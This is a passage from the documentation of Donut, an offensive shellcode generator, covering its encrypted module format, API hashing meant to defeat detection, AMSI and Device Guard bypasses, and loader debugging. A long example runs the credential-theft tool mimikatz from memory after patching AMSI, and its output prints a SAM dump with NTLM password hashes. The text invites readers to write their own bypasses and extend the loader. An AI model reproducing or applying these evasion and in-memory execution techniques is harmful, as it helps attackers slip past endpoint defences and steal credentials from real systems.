485 <span style='color:#800000; font-weight:bold; '>char</span> sig<span style='color:#808030; '>[</span>DONUT_SIG_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string to verify decryption</span>
486 uint64_t mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// hash of sig, to verify decryption was ok</span>
487
488 uint32_t zlen<span style='color:#800080; '>;</span> <span style='color:#696969; '>// compressed size of EXE/DLL/JS/VBS file</span>
489 uint32_t len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// real size of EXE/DLL/JS/VBS file</span>
490 uint8_t data<span style='color:#808030; '>[</span><span style='color:#008c00; '>4</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// data of EXE/DLL/JS/VBS file</span>
491 <span style='color:#800080; '>}</span> DONUT_MODULE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_MODULE<span style='color:#800080; '>;</span>
492 </pre>
493
494 <h2 id="hashing">9. Win32 API Hashing</h2>
495
496 <p>A hash function called <a href="https://github.com/odzhan/maru">Maru</a> is used to resolve the address of API at runtime. It uses a Davies-Meyer construction and the <a href="https://tinycrypt.wordpress.com/2017/01/11/asmcodes-speck/">SPECK</a> block cipher to derive a 64-bit hash from an API string. The padding is similar to what's used by MD4 and MD5 except only 32-bits of the string length are stored in the buffer instead of 64-bits. An initial value (IV) chosen randomly ensures the 64-bit API hashes are unique for each instance and cannot be used for detection of Donut. Future releases will likely support alternative methods of resolving address of API to decrease chance of detection.</p>
497
498 <h2 id="encryption">10. Symmetric Encryption</h2>
499
500 <p>The following structure is used to hold a master key, counter and nonce for Donut, which are generated randomly.</p>
501
502 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CRYPT <span style='color:#800080; '>{</span>
503 <span style='color:#603000; '>BYTE</span> mk<span style='color:#808030; '>[</span>DONUT_KEY_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// master key</span>
504 <span style='color:#603000; '>BYTE</span> ctr<span style='color:#808030; '>[</span>DONUT_BLK_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// counter + nonce</span>
505 <span style='color:#800080; '>}</span> DONUT_CRYPT<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CRYPT<span style='color:#800080; '>;</span>
506 </pre>
507
508 <p><a href="https://tinycrypt.wordpress.com/2017/02/20/asmcodes-chaskey-cipher/">Chaskey</a>, a 128-bit block cipher with support for 128-bit keys, is used in Counter (CTR) mode to decrypt a <var>Module</var> or an <var>Instance</var> at runtime. If an adversary discovers a staging server, it should not be feasible for them to decrypt a donut module without the key which is stored in the donut loader. Future releases will support downloading a key via DNS and also asymmetric encryption.</p>
509
510 <h2 id="bypass">11. Bypasses for AMSI/WLDP</h2>
511
512 <p>Donut includes a bypass system for AMSI and WLDP. Currently, Donut can bypass:</p>
513
514 <ul>
515 <li>AMSI in .NET v4.8</li>
516 <li>Device Guard policy preventing dynamically generated code from executing.</li>
517 </ul>
518
519 <p>You may customize our bypasses or add your own. The bypass logic is defined in loader/bypass.c. Each bypass implements the DisableAMSI with the signature <code>BOOL DisableAMSI(PDONUT_INSTANCE inst)</code> and DisableWLDP with <code>BOOL DisableWLDP(PDONUT_INSTANCE inst)</code>, both of which have a corresponding preprocessor directive. We have several <code>#if defined</code> blocks that check for definitions. Each block implements the same bypass function. For instance, our first bypass for AMSI is called <code>BYPASS_AMSI_A</code>. If donut is built with that variable defined, then that bypass will be used.</p>
520
521 <p>Why do it this way? Because it means that only the bypass you are using is built into loader.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using.</p>
522
523 <p>Another benefit of this design is that you may write your own AMSI/WLDP bypass. To build Donut with your new bypass, use an <code>if defined</code> block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined.</p>
524
525 <p>If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded.</p>
526
527 <h2 id="debug">12. Debugging The Generator and Loader</h2>
528
529 <p>The loader is capable of displaying detailed information about each step of file execution and can be useful in tracking down bugs. To build a debug-enabled executable, specify the debug label with nmake/make on Windows.</p>
530
531 <pre>
532 nmake debug -f Makefile.msvc
533 make debug -f Makefile.mingw
534 </pre>
535
536 <p>Use Donut to create a shellcode as you normally would and a file called <code>instance</code> will be saved to disk. The following example embeds mimikatz.exe in the loader using the Xpress Huffman compression algorithm. It also tells the loader to run the entrypoint as a thread, so that when mimikatz calls an exit-related API, it simply exits the thread. </p>
537
538 <pre>
539 C:\hub\donut>donut -t -z5 mimikatz.exe -p"lsadump::sam exit"
540
541 [ Donut shellcode generator v0.9.3
542 [ Copyright (c) 2019 TheWover, Odzhan
543
544 DEBUG: donut.c:1505:DonutCreate(): Entering.
545 DEBUG: donut.c:1283:validate_loader_cfg(): Validating loader configuration.
546 DEBUG: donut.c:1380:validate_loader_cfg(): Loader configuration passed validation.
547 DEBUG: donut.c:459:read_file_info(): Entering.
548 DEBUG: donut.c:467:read_file_info(): Checking extension of mimikatz.exe
549 DEBUG: donut.c:475:read_file_info(): Extension is ".exe"
550 DEBUG: donut.c:491:read_file_info(): File is EXE
551 DEBUG: donut.c:503:read_file_info(): Mapping mimikatz.exe into memory
552 DEBUG: donut.c:245:map_file(): Entering.
553 DEBUG: donut.c:531:read_file_info(): Checking characteristics
554 DEBUG: donut.c:582:read_file_info(): Leaving with error : 0
555 DEBUG: donut.c:1446:validate_file_cfg(): Validating configuration for input file.
556 DEBUG: donut.c:1488:validate_file_cfg(): Validation passed.
557 DEBUG: donut.c:674:build_module(): Entering.
558 DEBUG: donut.c:381:compress_file(): Reading fragment and workspace size
559 DEBUG: donut.c:387:compress_file(): workspace size : 1415999 | fragment size : 5161
560 DEBUG: donut.c:390:compress_file(): Allocating memory for compressed data.
561 DEBUG: donut.c:396:compress_file(): Compressing 0000024E9D7E0000 to 0000024E9DA50080 with RtlCompressBuffer(XPRESS HUFFMAN)
562 DEBUG: donut.c:433:compress_file(): Original file size : 1013912 | Compressed : 478726
563 DEBUG: donut.c:434:compress_file(): File size reduced by 53%
564 DEBUG: donut.c:436:compress_file(): Leaving with error : 0
565 DEBUG: donut.c:684:build_module(): Assigning 478726 bytes of 0000024E9DA50080 to data
566 DEBUG: donut.c:695:build_module(): Allocating 480054 bytes of memory for DONUT_MODULE
567 DEBUG: donut.c:772:build_module(): Copying data to module
568 DEBUG: donut.c:784:build_module(): Leaving with error : 0
569 DEBUG: donut.c:804:build_instance(): Entering.
570 DEBUG: donut.c:807:build_instance(): Allocating memory for instance
571 DEBUG: donut.c:814:build_instance(): The size of module is 480054 bytes. Adding to size of instance.
572 DEBUG: donut.c:817:build_instance(): Total length of instance : 483718
573 DEBUG: donut.c:846:build_instance(): Generating random key for instance
574 DEBUG: donut.c:855:build_instance(): Generating random key for module
575 DEBUG: donut.c:864:build_instance(): Generating random string to verify decryption
576 DEBUG: donut.c:871:build_instance(): Generating random IV for Maru hash
577 DEBUG: donut.c:879:build_instance(): Generating hashes for API using IV: 546E2FF018FD2A54
578 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : LoadLibraryA = ABB30FFE918BCF83
579 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : GetProcAddress = EF2C0663C0CDDC21
580 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : GetModuleHandleA = D40916771ECED480
581 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : VirtualAlloc = E445DF6F06219E85
582 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : VirtualFree = C6C992D6040B85A8
583 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : VirtualQuery = 556BF46109D12C9E
584 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : VirtualProtect = 032546126BB99713
585 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : Sleep = DEB476FF0E3D71E8
586 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : MultiByteToWideChar = A0DD238846F064F4
587 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : GetUserDefaultLCID = 03DE3865FC2DF17B
588 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : WaitForSingleObject = 40FCB82879AAB610
589 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : CreateThread = 954101E48C1D54F5
590 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : GetThreadContext = 18669E0FDC3FD0B8
591 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : GetCurrentThread = EB6E7C47D574D9F9
592 DEBUG: donut.c:892:build_instance(): Hash for shell32.dll : CommandLineToArgvW = EFD410EF534D57C3
593 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayCreate = A5AA007611CB6580
594 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayCreateVector = D5CEC16DD247A68A
595 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayPutElement = 6B140B7B87F27359
596 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayDestroy = C2FA65C58C68FC6C
597 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayGetLBound = ED5A331176BB8DDA
598 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayGetUBound = EA0D8BE258DC67DA
599 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SysAllocString = 3A7BBDEAA1DC3354
600 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SysFreeString = EEB92DFE18B7C306
601 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : LoadTypeLib = 687DD816E578C4E7
602 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetCrackUrlA = B0F95D86327741EC
603 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetOpenA = BDD70375BB72B131
604 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetConnectA = E74A4DD56C6B3154
605 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetSetOptionA = 527C502C0BC36267
606 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetReadFile = 055C3E8A4CF21475
607 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetCloseHandle = 4D1965E404D783BA
608 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : HttpOpenRequestA = CC736E0143DB8F2A
609 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : HttpSendRequestA = C87BFE8578BB0049
610 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : HttpQueryInfoA = FC7CC8D82764DFBF
611 DEBUG: donut.c:892:build_instance(): Hash for mscoree.dll : CorBindToRuntime = 6F6432B588D39C8D
612 DEBUG: donut.c:892:build_instance(): Hash for mscoree.dll : CLRCreateInstance = 2828FB8F68349704
613 DEBUG: donut.c:892:build_instance(): Hash for ole32.dll : CoInitializeEx = 9752F1AA167F8E79
614 DEBUG: donut.c:892:build_instance(): Hash for ole32.dll : CoCreateInstance = 8211344A519AF3BA
615 DEBUG: donut.c:892:build_instance(): Hash for ole32.dll : CoUninitialize = FF0605E1258BEE44
616 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlEqualUnicodeString = D5CEDA5C642834D7
617 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlEqualString = A69EAF72442222A4
618 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlUnicodeStringToAnsiString = 4DBA40D90962E1D6
619 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlInitUnicodeString = A1143A47656B2526
620 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlExitUserThread = 62FF88CDC045477E
621 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlExitUserProcess = E20BCE2C11E82C7B
622 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlCreateUnicodeString = A469294ED1E1D8DC
623 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlGetCompressionWorkSpaceSize = 61E26E7C5DD38D2C
624 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlDecompressBufferEx = 145C8CF24F5EAF3E
625 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : NtContinue = 12ACA3AD3CC20AF5
626 DEBUG: donut.c:895:build_instance(): Setting number of API to 48
627 DEBUG: donut.c:898:build_instance(): Setting DLL names to ole32;oleaut32;wininet;mscoree;shell32
628 DEBUG: donut.c:941:build_instance(): Copying strings required to bypass AMSI
629 DEBUG: donut.c:949:build_instance(): Copying strings required to bypass WLDP
630 DEBUG: donut.c:960:build_instance(): Copying strings required to replace command line.
631 DEBUG: donut.c:968:build_instance(): Copying strings required to intercept exit-related API
632 DEBUG: donut.c:1018:build_instance(): Copying module data to instance
633 DEBUG: donut.c:1024:build_instance(): Encrypting instance
634 DEBUG: donut.c:1042:build_instance(): Leaving with error : 0
635 DEBUG: donut.c:1210:build_loader(): Inserting opcodes
636 DEBUG: donut.c:1248:build_loader(): Copying 29548 bytes of x86 + amd64 shellcode
637 DEBUG: donut.c:1090:save_loader(): Saving instance 0000024E9DE90080 to file. 483718 bytes.
638 DEBUG: donut.c:1061:save_file(): Entering.
639 DEBUG: donut.c:1065:save_file(): Writing 483718 bytes of 0000024E9DE90080 to instance
640 DEBUG: donut.c:1070:save_file(): Leaving with error : 0
641 DEBUG: donut.c:1139:save_loader(): Saving loader as binary
642 DEBUG: donut.c:1172:save_loader(): Leaving with error : 0
643 DEBUG: donut.c:1540:DonutCreate(): Leaving with error : 0
644 [ Instance type : Embedded
645 [ Module file : "mimikatz.exe"
646 [ Entropy : Random names + Encryption
647 [ Compressed : Xpress Huffman (Reduced by 53%)
648 [ File type : EXE
649 [ Parameters : lsadump::sam exit
650 [ Target CPU : x86+amd64
651 [ AMSI/WDLP : continue
652 [ Shellcode : "loader.bin"
653 DEBUG: donut.c:1556:DonutDelete(): Entering.
654 DEBUG: donut.c:1562:DonutDelete(): Releasing memory for module.
655 DEBUG: donut.c:1568:DonutDelete(): Releasing memory for configuration.
656 DEBUG: donut.c:1574:DonutDelete(): Releasing memory for loader.
657 DEBUG: donut.c:289:unmap_file(): Releasing compressed data.
658 DEBUG: donut.c:294:unmap_file(): Unmapping input file.
659 DEBUG: donut.c:299:unmap_file(): Closing input file.
660 DEBUG: donut.c:1580:DonutDelete(): Leaving.
661 </pre>
662
663 <p>If successfully created, there should now be a file called "instance" in the same directory as the loader. Pass the instance file as a parameter to loader.exe which should also be in the same directory.</p>
664
665 <pre>
666 C:\hub\donut>loader instance
667 Running...
668 DEBUG: loader/loader.c:109:MainProc(): Maru IV : 546E2FF018FD2A54
669 DEBUG: loader/loader.c:112:MainProc(): Resolving address for VirtualAlloc() : E445DF6F06219E85
670 DEBUG: loader/loader.c:116:MainProc(): Resolving address for VirtualFree() : C6C992D6040B85A8
671 DEBUG: loader/loader.c:120:MainProc(): Resolving address for RtlExitUserProcess() : E20BCE2C11E82C7B
672 DEBUG: loader/loader.c:129:MainProc(): VirtualAlloc : 00007FFFD1DAA190 VirtualFree : 00007FFFD1DAA180
673 DEBUG: loader/loader.c:131:MainProc(): Allocating 483718 bytes of RW memory
674 DEBUG: loader/loader.c:143:MainProc(): Copying 483718 bytes of data to memory 00000178FEA30000
675 DEBUG: loader/loader.c:147:MainProc(): Zero initializing PDONUT_ASSEMBLY
676 DEBUG: loader/loader.c:156:MainProc(): Decrypting 483718 bytes of instance
677 DEBUG: loader/loader.c:163:MainProc(): Generating hash to verify decryption
678 DEBUG: loader/loader.c:165:MainProc(): Instance : 33C49D5864287AEF | Result : 33C49D5864287AEF
679 DEBUG: loader/loader.c:172:MainProc(): Resolving LoadLibraryA
680 DEBUG: loader/loader.c:189:MainProc(): Loading ole32
681 DEBUG: loader/loader.c:189:MainProc(): Loading oleaut32
682 DEBUG: loader/loader.c:189:MainProc(): Loading wininet
683 DEBUG: loader/loader.c:189:MainProc(): Loading mscoree
684 DEBUG: loader/loader.c:189:MainProc(): Loading shell32
685 DEBUG: loader/loader.c:193:MainProc(): Resolving 48 API
686 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for EF2C0663C0CDDC21
687 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for D40916771ECED480
688 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for E445DF6F06219E85
689 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for C6C992D6040B85A8
690 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 556BF46109D12C9E
691 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 032546126BB99713
692 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for DEB476FF0E3D71E8
693 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for A0DD238846F064F4
694 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 03DE3865FC2DF17B
695 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 40FCB82879AAB610
696 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 954101E48C1D54F5
697 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 18669E0FDC3FD0B8
698 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for EB6E7C47D574D9F9
699 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for EFD410EF534D57C3
700 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for A5AA007611CB6580
701 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for D5CEC16DD247A68A
702 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 6B140B7B87F27359
703 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for C2FA65C58C68FC6C
704 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for ED5A331176BB8DDA
705 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for EA0D8BE258DC67DA
706 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 3A7BBDEAA1DC3354
707 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for EEB92DFE18B7C306
708 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 687DD816E578C4E7
709 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for B0F95D86327741EC
710 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for BDD70375BB72B131
711 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for E74A4DD56C6B3154
712 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 527C502C0BC36267
713 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 055C3E8A4CF21475
714 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 4D1965E404D783BA
715 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for CC736E0143DB8F2A
716 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for C87BFE8578BB0049
717 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for FC7CC8D82764DFBF
718 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 6F6432B588D39C8D
719 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 2828FB8F68349704
720 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 9752F1AA167F8E79
721 DEBUG: peb.c:87:FindExport(): 9752f1aa167f8e79 is forwarded to api-ms-win-core-com-l1-1-0.CoInitializeEx
722 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
723 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoInitializeEx)
724 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 8211344A519AF3BA
725 DEBUG: peb.c:87:FindExport(): 8211344a519af3ba is forwarded to api-ms-win-core-com-l1-1-0.CoCreateInstance
726 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
727 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoCreateInstance)
728 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for FF0605E1258BEE44
729 DEBUG: peb.c:87:FindExport(): ff0605e1258bee44 is forwarded to api-ms-win-core-com-l1-1-0.CoUninitialize
730 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
731 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoUninitialize)
732 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for D5CEDA5C642834D7
733 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for A69EAF72442222A4
734 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 4DBA40D90962E1D6
735 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for A1143A47656B2526
736 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 62FF88CDC045477E
737 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for E20BCE2C11E82C7B
738 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for A469294ED1E1D8DC
739 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 61E26E7C5DD38D2C
740 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 145C8CF24F5EAF3E
741 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 12ACA3AD3CC20AF5
742 DEBUG: loader/loader.c:218:MainProc(): Module is embedded.
743 DEBUG: bypass.c:112:DisableAMSI(): Length of AmsiScanBufferStub is 36 bytes.
744 DEBUG: bypass.c:122:DisableAMSI(): Overwriting AmsiScanBuffer
745 DEBUG: bypass.c:137:DisableAMSI(): Length of AmsiScanStringStub is 36 bytes.
746 DEBUG: bypass.c:147:DisableAMSI(): Overwriting AmsiScanString
747 DEBUG: loader/loader.c:226:MainProc(): DisableAMSI OK
748 DEBUG: bypass.c:326:DisableWLDP(): Length of WldpQueryDynamicCodeTrustStub is 20 bytes.
749 DEBUG: bypass.c:350:DisableWLDP(): Length of WldpIsClassInApprovedListStub is 36 bytes.
750 DEBUG: loader/loader.c:232:MainProc(): DisableWLDP OK
751 DEBUG: loader/loader.c:239:MainProc(): Compression engine is 5
752 DEBUG: loader/loader.c:242:MainProc(): Allocating 1015240 bytes of memory for decompressed file and module information
753 DEBUG: loader/loader.c:252:MainProc(): Duplicating DONUT_MODULE
754 DEBUG: loader/loader.c:256:MainProc(): Decompressing 478726 -> 1013912
755 DEBUG: loader/loader.c:270:MainProc(): WorkSpace size : 1415999 | Fragment size : 5161
756 DEBUG: loader/loader.c:277:MainProc(): Decompressing with RtlDecompressBufferEx(XPRESS HUFFMAN)
757 DEBUG: loader/loader.c:302:MainProc(): Checking type of module
758 DEBUG: inmem_pe.c:103:RunPE(): Allocating 1019904 (0xf9000) bytes of RWX memory for file
759 DEBUG: inmem_pe.c:112:RunPE(): Copying Headers
760 DEBUG: inmem_pe.c:115:RunPE(): Copying each section to RWX memory 00000178FF170000
761 DEBUG: inmem_pe.c:127:RunPE(): Applying Relocations
762 DEBUG: inmem_pe.c:151:RunPE(): Processing the Import Table
763 DEBUG: inmem_pe.c:159:RunPE(): Loading ADVAPI32.dll
764 DEBUG: inmem_pe.c:159:RunPE(): Loading Cabinet.dll
765 DEBUG: inmem_pe.c:159:RunPE(): Loading CRYPT32.dll
766 DEBUG: inmem_pe.c:159:RunPE(): Loading cryptdll.dll
767 DEBUG: inmem_pe.c:159:RunPE(): Loading DNSAPI.dll
768 DEBUG: inmem_pe.c:159:RunPE(): Loading FLTLIB.DLL
769 DEBUG: inmem_pe.c:159:RunPE(): Loading NETAPI32.dll
770 DEBUG: inmem_pe.c:159:RunPE(): Loading ole32.dll
771 DEBUG: inmem_pe.c:159:RunPE(): Loading OLEAUT32.dll
772 DEBUG: inmem_pe.c:159:RunPE(): Loading RPCRT4.dll
773 DEBUG: inmem_pe.c:159:RunPE(): Loading SHLWAPI.dll
774 DEBUG: inmem_pe.c:159:RunPE(): Loading SAMLIB.dll
775 DEBUG: inmem_pe.c:159:RunPE(): Loading Secur32.dll
776 DEBUG: inmem_pe.c:159:RunPE(): Loading SHELL32.dll
777 DEBUG: inmem_pe.c:159:RunPE(): Loading USER32.dll
778 DEBUG: inmem_pe.c:159:RunPE(): Loading USERENV.dll
779 DEBUG: inmem_pe.c:159:RunPE(): Loading VERSION.dll
780 DEBUG: inmem_pe.c:159:RunPE(): Loading HID.DLL
781 DEBUG: inmem_pe.c:159:RunPE(): Loading SETUPAPI.dll
782 DEBUG: inmem_pe.c:159:RunPE(): Loading WinSCard.dll
783 DEBUG: inmem_pe.c:159:RunPE(): Loading WINSTA.dll
784 DEBUG: inmem_pe.c:159:RunPE(): Loading WLDAP32.dll
785 DEBUG: inmem_pe.c:159:RunPE(): Loading advapi32.dll
786 DEBUG: inmem_pe.c:159:RunPE(): Loading msasn1.dll
787 DEBUG: inmem_pe.c:159:RunPE(): Loading ntdll.dll
788 DEBUG: inmem_pe.c:159:RunPE(): Loading netapi32.dll
789 DEBUG: inmem_pe.c:159:RunPE(): Loading KERNEL32.dll
790 DEBUG: inmem_pe.c:182:RunPE(): Replacing KERNEL32.dll!ExitProcess with ntdll!RtlExitUserThread
791 DEBUG: inmem_pe.c:159:RunPE(): Loading msvcrt.dll
792 DEBUG: inmem_pe.c:182:RunPE(): Replacing msvcrt.dll!exit with ntdll!RtlExitUserThread
793 DEBUG: inmem_pe.c:182:RunPE(): Replacing msvcrt.dll!_cexit with ntdll!RtlExitUserThread
794 DEBUG: inmem_pe.c:182:RunPE(): Replacing msvcrt.dll!_exit with ntdll!RtlExitUserThread
795 DEBUG: inmem_pe.c:196:RunPE(): Processing Delayed Import Table
796 DEBUG: inmem_pe.c:204:RunPE(): Loading bcrypt.dll
797 DEBUG: inmem_pe.c:204:RunPE(): Loading ncrypt.dll
798 DEBUG: inmem_pe.c:319:RunPE(): Setting command line: MTFM lsadump::sam exit
799 DEBUG: inmem_pe.c:433:SetCommandLineW(): Obtaining handle for kernelbase
800 DEBUG: inmem_pe.c:449:SetCommandLineW(): Searching 2161 pointers
801 DEBUG: inmem_pe.c:458:SetCommandLineW(): BaseUnicodeCommandLine at 00007FFFD1609E70 : loader instance
802 DEBUG: inmem_pe.c:466:SetCommandLineW(): New BaseUnicodeCommandLine at 00007FFFD1609E70 : MTFM lsadump::sam exit
803 DEBUG: inmem_pe.c:483:SetCommandLineW(): New BaseAnsiCommandLine at 00007FFFD1609E60 : MTFM lsadump::sam exit
804 DEBUG: inmem_pe.c:530:SetCommandLineW(): Setting ucrtbase.dll!__p__acmdln "loader instance" to "MTFM lsadump::sam exit"
805 DEBUG: inmem_pe.c:543:SetCommandLineW(): Setting ucrtbase.dll!__p__wcmdln "loader instance" to "MTFM lsadump::sam exit"
806 DEBUG: inmem_pe.c:530:SetCommandLineW(): Setting msvcrt.dll!_acmdln "loader instance" to "MTFM lsadump::sam exit"
807 DEBUG: inmem_pe.c:543:SetCommandLineW(): Setting msvcrt.dll!_wcmdln "loader instance" to "MTFM lsadump::sam exit"
808 DEBUG: inmem_pe.c:323:RunPE(): Wiping Headers from memory
809 DEBUG: inmem_pe.c:332:RunPE(): Creating thread for entrypoint of EXE : 00000178FF2007F8
810
811
812 .#####. mimikatz 2.2.0 (x64) #18362 Aug 14 2019 01:31:47
813 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
814 ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
815 ## \ / ## > http://blog.gentilkiwi.com/mimikatz
816 '## v ##' Vincent LE TOUX ( [email protected] )
817 '#####' > http://pingcastle.com / http://mysmartlogon.com ***/
818
819 mimikatz(commandline) # lsadump::sam
820 Domain : DESKTOP-B888L2R
821 SysKey : b43927eef0f56833c527ea951c37abc1
822 Local SID : S-1-5-21-1047138248-288568923-692962947
823
824 SAMKey : f1813d42812fcde9c5fe08807370613d
825
826 RID : 000001f4 (500)
827 User : Administrator
828
829 RID : 000001f5 (501)
830 User : Guest
831
832 RID : 000001f7 (503)
833 User : DefaultAccount
834
835 RID : 000001f8 (504)
836 User : WDAGUtilityAccount
837 Hash NTLM: c288f1c30b232571b0222ae6a5b7d223
838
839 RID : 000003e9 (1001)
840 User : john
841 Hash NTLM: 8846f7eaee8fb117ad06bdd830b7586c
842
843 RID : 000003ea (1002)
844 User : user
845 Hash NTLM: 5835048ce94ad0564e29a924a03510ef
846
847 RID : 000003eb (1003)
848 User : test
849
850 mimikatz(commandline) # exit
851 Bye!
852
853 DEBUG: inmem_pe.c:338:RunPE(): Process terminated
854 DEBUG: inmem_pe.c:349:RunPE(): Erasing 1019904 bytes of memory at 00000178FF170000
855 DEBUG: inmem_pe.c:353:RunPE(): Releasing memory
856 DEBUG: loader/loader.c:343:MainProc(): Erasing RW memory for instance
857 DEBUG: loader/loader.c:346:MainProc(): Releasing RW memory for instance
858 DEBUG: loader/loader.c:354:MainProc(): Returning to caller
859 </pre>
860
861 <p>Obviously you should be cautious with what files you decide to execute on your machine.</p>
862
863 <h2 id="loader">13. Extending The Loader</h2>
864
865 <p>Donut was never designed with modularity in mind, however, a new version in future will try to simplify the process of extending the loader, so that others can write their own code for it. Currently, simple changes to the loader can sometimes require lots of changes to the entire code base and this isn't really ideal. If for any reason you want to update the loader to include additional functionality, the following steps are required.</p>
866
867 <h3>1. Declare the function pointers</h3>
868
869 <p>For each API you want the loader to use, declare a function pointer in loader/winapi.h. For example, the <code>Sleep</code> API is declared in its SDK header file as:</p>
870
